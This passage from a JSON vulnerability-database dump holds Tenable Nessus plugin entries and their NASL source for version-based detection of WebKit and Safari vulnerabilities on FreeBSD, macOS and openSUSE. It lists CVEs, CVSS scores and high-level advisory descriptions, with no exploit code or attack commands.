script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3<2.16.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:39:38", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 10.1.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists in the\n WebKit component due to improper handling of SVG filters.\n An unauthenticated, remote attacker can exploit this,\n via a timing side-channel attack, to disclose sensitive\n cross-domain information. (CVE-2017-7006)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to spoof the address\n bar via a specially crafted website. (CVE-2017-7011)\n\n - Multiple memory corruption issues exists in the 'WebKit\n Web Inspector' component due to improper validation of\n input. An unauthenticated, remote attacker can exploit\n these issues, via a specially crafted web page, to\n execute arbitrary code. 
(CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - Multiple cross-site scripting (XSS) vulnerabilities\n exist in the WebKit component in the DOMParser due to\n improper validation of user-supplied input before\n returning it to users. An unauthenticated, remote\n attacker can exploit these issue, via a specially\n crafted URL, to execute arbitrary script code in a\n user's browser session. (CVE-2017-7038, CVE-2017-7059)\n\n - A denial of service vulnerability exists in the Safari\n Printing component. An unauthenticated, remote attacker\n can exploit this, via a specially crafted web page, to\n create an infinite number of print dialogs.\n (CVE-2017-7060)\n\n - An unspecified memory initialization flaw exists in\n WebKit. A local attacker can exploit this, via a\n specially crafted application, to disclose restricted\n memory. 
(CVE-2017-7064)", "edition": 27, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-24T00:00:00", "title": "macOS : Apple Safari < 10.1.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7060", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI10_1_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101931", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101931);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\n\n script_cve_id(\n \"CVE-2017-7006\",\n \"CVE-2017-7011\",\n \"CVE-2017-7012\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7038\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7059\",\n \"CVE-2017-7060\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99885,\n 99886,\n 99887,\n 99888,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-5\");\n script_xref(name:\"ZDI\", value:\"ZDI-17-489\");\n\n script_name(english:\"macOS : Apple Safari < 10.1.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A 
web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 10.1.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists in the\n WebKit component due to improper handling of SVG filters.\n An unauthenticated, remote attacker can exploit this,\n via a timing side-channel attack, to disclose sensitive\n cross-domain information. (CVE-2017-7006)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to spoof the address\n bar via a specially crafted website. (CVE-2017-7011)\n\n - Multiple memory corruption issues exists in the 'WebKit\n Web Inspector' component due to improper validation of\n input. An unauthenticated, remote attacker can exploit\n these issues, via a specially crafted web page, to\n execute arbitrary code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - Multiple cross-site scripting (XSS) vulnerabilities\n exist in the WebKit component in the DOMParser due to\n improper validation of user-supplied input before\n returning it to users. 
An unauthenticated, remote\n attacker can exploit these issue, via a specially\n crafted URL, to execute arbitrary script code in a\n user's browser session. (CVE-2017-7038, CVE-2017-7059)\n\n - A denial of service vulnerability exists in the Safari\n Printing component. An unauthenticated, remote attacker\n can exploit this, via a specially crafted web page, to\n create an infinite number of print dialogs.\n (CVE-2017-7060)\n\n - An unspecified memory initialization flaw exists in\n WebKit. A local attacker can exploit this, via a\n specially crafted application, to disclose restricted\n memory. (CVE-2017-7064)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207921\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2017/Jul/39\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 10.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network 
Security, Inc.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(10|11|12)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X Yosemite 10.10 / Mac OS X El Capitan 10.11 / macOS Sierra 10.12\");\n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"10.1.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report, xss:true);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:31:25", "description": "This update for webkit2gtk3 to version 2.18.0 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2017-7039: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7018: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website 
(bsc#1050469).\n\n - CVE-2017-7030: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7037: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7034: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7055: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7056: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7064: An issue was fixed that allowed remote\n attackers to bypass intended memory-read restrictions\n via a crafted app (bsc#1050469).\n\n - CVE-2017-7061: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7048: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7046: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-2538: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and 
application crash) via a\n crafted website (bsc#1045460)\n\n - CVE-2017-2496: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2539: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2510: An issue was fixed that allowed remote\n attackers to conduct Universal XSS (UXSS) attacks via a\n crafted website that improperly interacts with pageshow\n events.\n\n - CVE-2017-2365: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2366: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2373: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2363: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2362: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2354: 
An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749).\n\n - CVE-2017-2355: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (uninitialized memory access and application\n crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2356: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2371: An issue was fixed that allowed remote\n attackers to launch popups via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2364: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2369: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2016-7656: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7635: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7654: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7639: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7645: An issue 
was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7652: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7641: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7632: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7599: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site that used\n HTTP redirects (bsc#1020950)\n\n - CVE-2016-7592: An issue was fixed that allowed remote\n attackers to obtain sensitive information via crafted\n JavaScript prompts on a website (bsc#1020950)\n\n - CVE-2016-7589: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7623: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a blob URL\n on a website (bsc#1020950)\n\n - CVE-2016-7586: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a crafted\n website (bsc#1020950)\n\nFor other non-security fixes please check the changelog.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-13T00:00:00", "title": "openSUSE Security Update : webkit2gtk3 
(openSUSE-2017-1268)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7064", "CVE-2017-2355", "CVE-2017-7056", "CVE-2016-7599", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2016-7586", "CVE-2017-2538", "CVE-2017-2365", "CVE-2017-7037", "CVE-2017-7018", "CVE-2016-7641", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-2373", "CVE-2017-2356", "CVE-2016-7639", "CVE-2016-7592", "CVE-2016-7656", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7030", "CVE-2017-2354"], "modified": "2017-11-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", 
"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo"], "id": "OPENSUSE-2017-1268.NASL", "href": "https://www.tenable.com/plugins/nessus/104526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1268.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104526);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-7586\", \"CVE-2016-7589\", \"CVE-2016-7592\", \"CVE-2016-7599\", \"CVE-2016-7623\", \"CVE-2016-7632\", \"CVE-2016-7635\", \"CVE-2016-7639\", \"CVE-2016-7641\", \"CVE-2016-7645\", \"CVE-2016-7652\", \"CVE-2016-7654\", \"CVE-2016-7656\", \"CVE-2017-2350\", \"CVE-2017-2354\", \"CVE-2017-2355\", \"CVE-2017-2356\", \"CVE-2017-2362\", \"CVE-2017-2363\", \"CVE-2017-2364\", \"CVE-2017-2365\", \"CVE-2017-2366\", \"CVE-2017-2369\", \"CVE-2017-2371\", \"CVE-2017-2373\", \"CVE-2017-2496\", \"CVE-2017-2510\", \"CVE-2017-2538\", \"CVE-2017-2539\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2017-1268)\");\n script_summary(english:\"Check for the openSUSE-2017-1268 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.18.0 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2017-7039: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a 
denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7018: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7030: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7037: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7034: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7055: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7056: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7064: An issue was fixed that allowed remote\n attackers to bypass intended memory-read restrictions\n via a crafted app (bsc#1050469).\n\n - CVE-2017-7061: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7048: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7046: An issue was fixed that allowed remote\n 
attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-2538: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1045460)\n\n - CVE-2017-2496: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2539: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2510: An issue was fixed that allowed remote\n attackers to conduct Universal XSS (UXSS) attacks via a\n crafted website that improperly interacts with pageshow\n events.\n\n - CVE-2017-2365: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2366: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2373: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2363: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2362: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to 
bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2354: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749).\n\n - CVE-2017-2355: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (uninitialized memory access and application\n crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2356: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2371: An issue was fixed that allowed remote\n attackers to launch popups via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2364: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2369: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2016-7656: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7635: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7654: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory 
corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7639: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7645: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7652: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7641: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7632: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7599: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site that used\n HTTP redirects (bsc#1020950)\n\n - CVE-2016-7592: An issue was fixed that allowed remote\n attackers to obtain sensitive information via crafted\n JavaScript prompts on a website (bsc#1020950)\n\n - CVE-2016-7589: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7623: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a blob URL\n on a website (bsc#1020950)\n\n - CVE-2016-7586: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a crafted\n website (bsc#1020950)\n\nFor other 
non-security fixes please check the changelog.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1024749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1045460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050469\"\n );\n # https://features.opensuse.org/323744\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://features.opensuse.org/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 